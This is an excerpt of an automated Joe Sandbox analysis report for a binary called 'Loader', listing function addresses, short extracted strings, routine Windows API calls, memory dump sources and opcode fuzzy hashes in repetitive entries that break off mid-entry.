Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: U123$['e!
API String ID: 0-1796562098
Opcode ID: fb9722cd765a8f1f667f1c5091e886384392bc66525bf14e4da9e340b7674b2c
Instruction ID: 4eed49639a68c285c632c5086ed668ab9398e64d5d9a1521270edd373996c009
Opcode Fuzzy Hash: fb9722cd765a8f1f667f1c5091e886384392bc66525bf14e4da9e340b7674b2c
Instruction Fuzzy Hash: 5581AAB160C3958FD714CF28D89076FBBE0AFC5714F04892DE5D99B282D7B889498B82

Function 001FEBC0 Relevance: 2.7, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

T, xrefs: 001FEC82
0, xrefs: 001FED32

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 0$T
API String ID: 0-1187268809
Opcode ID: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
Instruction ID: 76cd17c8991f488d8aba02e49121924803925fbdc1cd900e8d75d1de02b36e74
Opcode Fuzzy Hash: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
Instruction Fuzzy Hash: 2A719DB06083448FD718CF14C891B6BBBE6EF89314F24882DFA958B3A1C775D855CB92

Function 002042E0 Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

@, xrefs: 00204391
/.-,, xrefs: 002043AF

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: /.-,$@
API String ID: 0-3723685748
Opcode ID: 14b47141bad7744aef7bc387c9587b37535cf199f5fcc04529429db9ed98bd49
Instruction ID: 1cd1be7c8e2a1740df5f21c1152028bb2444e94d3dad7dfc80d0378bcdf821cb
Opcode Fuzzy Hash: 14b47141bad7744aef7bc387c9587b37535cf199f5fcc04529429db9ed98bd49
Instruction Fuzzy Hash: 604103B09143118BD704AF14E88576AB7F0FF94328F14C62CEA99573E2E7359A14C782

Function 001FABBD Relevance: 2.6, Strings: 2, Instructions: 105COMMON

Download Yara Rule

Strings

s%u', xrefs: 001FAC92
!, xrefs: 001FAC9A

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: !$s%u'
API String ID: 0-439224852
Opcode ID: 9f12cfbe8f813cdc99b4eaff1b801d2e6fd59d9a3446994fbc70c022c850fc17
Instruction ID: 02ce6a5054db96726ffde291dae82217e5df077cdabaad39923507b4d846af6b
Opcode Fuzzy Hash: 9f12cfbe8f813cdc99b4eaff1b801d2e6fd59d9a3446994fbc70c022c850fc17
Instruction Fuzzy Hash: 6441F6B66993418FD304CF56D8C425BBBE7AFC5304F199D6CE1948B345CBB8C50A8B52

Function 001C78F6 Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

0, xrefs: 001C7954
8, xrefs: 001C794C

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 0efc1294e32fe2dc1f15a8140f78967acb3ef10ebe1a0021df57d37c3e985f00
Instruction ID: 32a187033c48b92d56eeb35f99c41d4ca2a3b68c77445a285bdcb57d47e6751f
Opcode Fuzzy Hash: 0efc1294e32fe2dc1f15a8140f78967acb3ef10ebe1a0021df57d37c3e985f00
Instruction Fuzzy Hash: 9531133660D3C58FC315CA28D480A9FBFE2AFE6254F08494CE8C897352C674D949CB93

Function 001BEF00 Relevance: 2.5, Strings: 1, Instructions: 1271COMMON

Download Yara Rule

Strings

@, xrefs: 001C0F15

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5d5fee6f854f4cc3e9978a30db991d18a4c44d502c45dc1ba387623374671fb8
Instruction ID: d41455c1354e9f984b51e18bd111f0fad864a5cc2790371b612dd3b9a2b37d5e
Opcode Fuzzy Hash: 5d5fee6f854f4cc3e9978a30db991d18a4c44d502c45dc1ba387623374671fb8
Instruction Fuzzy Hash: 1C9205316083519FC719CE28C894B6ABBE2AFEA354F18862DF895C7392D334DD45CB81

Function 001A9074 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001A906F,?,?,00000008,?,?,001B14E5,00000000), ref: 001A92A1

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c807e6d11d355916fd1871b2023f326ed4d6d3be98fd9a91c8ce66f7ea239b4b
Instruction ID: 90333d4f9bf3d511af0e37a4d6ab85f3336f0f049aca9d41e7101958b45a498f
Opcode Fuzzy Hash: c807e6d11d355916fd1871b2023f326ed4d6d3be98fd9a91c8ce66f7ea239b4b
Instruction Fuzzy Hash: 97B15D39610609DFDB19CF28C48AB657BF1FF46364F258659E89ACF2A1C335E981CB40

Function 00196E6F Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00196E85

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ba9e2467662cd4c6c08647353e035190b448d2dc5e3e0cbbd08f6150c4e31637
Instruction ID: 26a945103a6a20b131ec8d6032a44276589b5b8ecc4ad30489734be214fd6e15
Opcode Fuzzy Hash: ba9e2467662cd4c6c08647353e035190b448d2dc5e3e0cbbd08f6150c4e31637
Instruction Fuzzy Hash: DFA18DB5E146058FDB18DF68EC8269DBBF1FB48314F14862AE419EB790D3749880CF90

Function 001F0892 Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

7e4g, xrefs: 001F0D08

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: 7e4g
API String ID: 0-1784156611
Opcode ID: 7f5b4d31056eb29012149fd956ad457f27fd3afe1bcf07fbe2cca6404ed376c9
Instruction ID: 5a0e581880f46faafe86bef2ea8d864c98e7a41f438d0511f29089cbf95a9f28
Opcode Fuzzy Hash: 7f5b4d31056eb29012149fd956ad457f27fd3afe1bcf07fbe2cca6404ed376c9
Instruction Fuzzy Hash: DCD1F871505B808ED7268F35C8517A3BBE2AF97304F1889ACC0EB8B387C779A506CB55

Function 001ED800 Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

", xrefs: 001EDAF7

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 167a229d93af2f3fcaec2ea9350f6d5f63d084a78ccf1060cfe67d9ad9d031b2
Instruction ID: 936ee2b17ff3dd0011ca6f0c28b321a4d2b9a00a041242d43e2d8353bb5d2ab0
Opcode Fuzzy Hash: 167a229d93af2f3fcaec2ea9350f6d5f63d084a78ccf1060cfe67d9ad9d031b2
Instruction Fuzzy Hash: E1D135B2A08B845FD724CE26E481B6FB7E5AFD1354F19892DE48A87381E734DD44C782

Function 001A9DAA Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3184a0ec054909e325b8ce640e27905cf5fc95e396ddf457d72f13f36e2b83a
Instruction ID: 8a380481a20c2bee7db281587245acd9c56db4a2fb574b801275d2217bb40ca5
Opcode Fuzzy Hash: d3184a0ec054909e325b8ce640e27905cf5fc95e396ddf457d72f13f36e2b83a
Instruction Fuzzy Hash: 9A31B776900219AFCB20EFA9DC85DBB777DEB85314F144559F815D7245EB30EE808B90

Function 001E9400 Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

%*+(, xrefs: 001E94C4

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: b29c564438925c3d96467325200ae336ebd7521098b972593b0ffd4d5b9ce038
Instruction ID: 44eb8d332fab0c9a4f6eb82036847e95bc9066e8de1b853a56cd7763f646e604
Opcode Fuzzy Hash: b29c564438925c3d96467325200ae336ebd7521098b972593b0ffd4d5b9ce038
Instruction Fuzzy Hash: 5AA134B1A087818BD7159F26C88072FB7E2EF95754F18892DE9858B382E334D945CB92

Function 001AC9D6 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001ACA2A

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 51f18b36cb8b1dcdf7a2cd6506f5fccd4f428ae4979d66267acfed04a5c3193d
Instruction ID: 97e85fbca593618338629581bed875d5625d537a3b19c89060c662aa3f9620dc
Opcode Fuzzy Hash: 51f18b36cb8b1dcdf7a2cd6506f5fccd4f428ae4979d66267acfed04a5c3193d
Instruction Fuzzy Hash: AD219F7A61020AABDB28EF65DC42ABA77ACEF56314F10407AF906D7141FB74ED408B90

Function 001ECA95 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

FKYW, xrefs: 001ECC85

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: FKYW
API String ID: 0-2105710742
Opcode ID: c382b0799cc131b0dcaf5d4eecf6c55e74b988057bbdf1f1d940c59e0b7dfa2f
Instruction ID: 0f6d6b7fd86f8c5b12f41e9bd0489700c83d5d9882428ae7080c043dd714fa98
Opcode Fuzzy Hash: c382b0799cc131b0dcaf5d4eecf6c55e74b988057bbdf1f1d940c59e0b7dfa2f
Instruction Fuzzy Hash: CEA1F6325087D18FC315CF29885066EBBE2AF96724F198B5CF4E99B391C735D842CB92

Function 001BF4B1 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

@, xrefs: 001BF7E4

Memory Dump Source

Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: bd5473dd6bda91648a11730aa12168d38c04bca27107d6d1bbc9fc31ebc23fac
Instruction ID: 3f2d132bdcdee61c956a786d03f015c23d19414d728bd87b65ab30fb78692f47
Opcode Fuzzy Hash: bd5473dd6bda91648a11730aa12168d38c04bca27107d6d1bbc9fc31ebc23fac
Instruction Fuzzy Hash: F6C18875A0C3518FC718CF28C4907AABBE2ABD9314F148A6DF8D997391D734D909CB82

Function 001AC65D Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

EnumSystemLocalesW.KERNEL32(001AC783,00000001,00000000,?,-00000050,?,001ACDB4,00000000,?,?,?,00000055,?), ref: 001AC6CF

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 967f63f9f168dc6327b21c252d1d1f4156a0456c80fae4a43c4c3acc86d084f4
Instruction ID: 050323b2215b9c297f6c0b1411f57650ac635ff153219c69f85af4e47abdb74b
Opcode Fuzzy Hash: 967f63f9f168dc6327b21c252d1d1f4156a0456c80fae4a43c4c3acc86d084f4
Instruction Fuzzy Hash: 57110C3F6047059FDB18DF39C8916BAB792FF81358B15442CE54A87B40D771B942CB80

Function 001ACC05 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001AC99F,00000000,00000000,?), ref: 001ACC31

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 8d9218ef7d8072699ff8506a8844548048daff2505763a159d168b45176f22e8
Instruction ID: 09dbb89aac85ddc2b382e49712b12c60a29ed2bb48658b2e9c765e5554e65526
Opcode Fuzzy Hash: 8d9218ef7d8072699ff8506a8844548048daff2505763a159d168b45176f22e8
Instruction Fuzzy Hash: CEF02D3A600211BBDB285B24CD457BA7768DB41B64F054424EC19A3144EB30FE41C6D0

Function 001AC6F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

EnumSystemLocalesW.KERNEL32(001AC9D6,00000001,?,?,-00000050,?,001ACD78,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001AC742

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8a4a556c92e4ea471d5af895568dfa57020b605a0b01ace935b4724c44c751a6
Instruction ID: 5a9d39866f879c14f9c37ff392989ce365e4f925609b9a710952bfb542de078a
Opcode Fuzzy Hash: 8a4a556c92e4ea471d5af895568dfa57020b605a0b01ace935b4724c44c751a6
Instruction Fuzzy Hash: A8F0F63E2003085FDB145F75DC81A7A7B91FF92368B05442DF9454B690D7B19C41CB90

Function 001A3366 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0019D4FD: EnterCriticalSection.KERNEL32(-00215168,?,001A0317,00000000,001BC430,0000000C,001A02DE,?,?,001A32F5,?,?,001A52E3,00000001,00000364,00000000), ref: 0019D50C

EnumSystemLocalesW.KERNEL32(001A3359,00000001,001BC580,0000000C,001A370C,00000000), ref: 001A339E

Memory Dump Source

Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_Loader.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: a544f36a0c03669a0747f0ac10c772e48fdba5a5133acdc4b3295d5107e7d2cb
Instruction ID: f83ce380618eceae3826d4f9b5bd663d449051c528f89691952f91e2c8d5a76c
Opcode Fuzzy Hash: a544f36a0c03669a0747f0ac10c772e48fdba5a5133acdc4b3295d5107e7d2cb
Instruction Fuzzy Hash: 6FF03776A04214EFDB00EFA8E846B9D77B1FB59721F10855AF421DB2A0DBB559408B40

Function 001AC612 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB

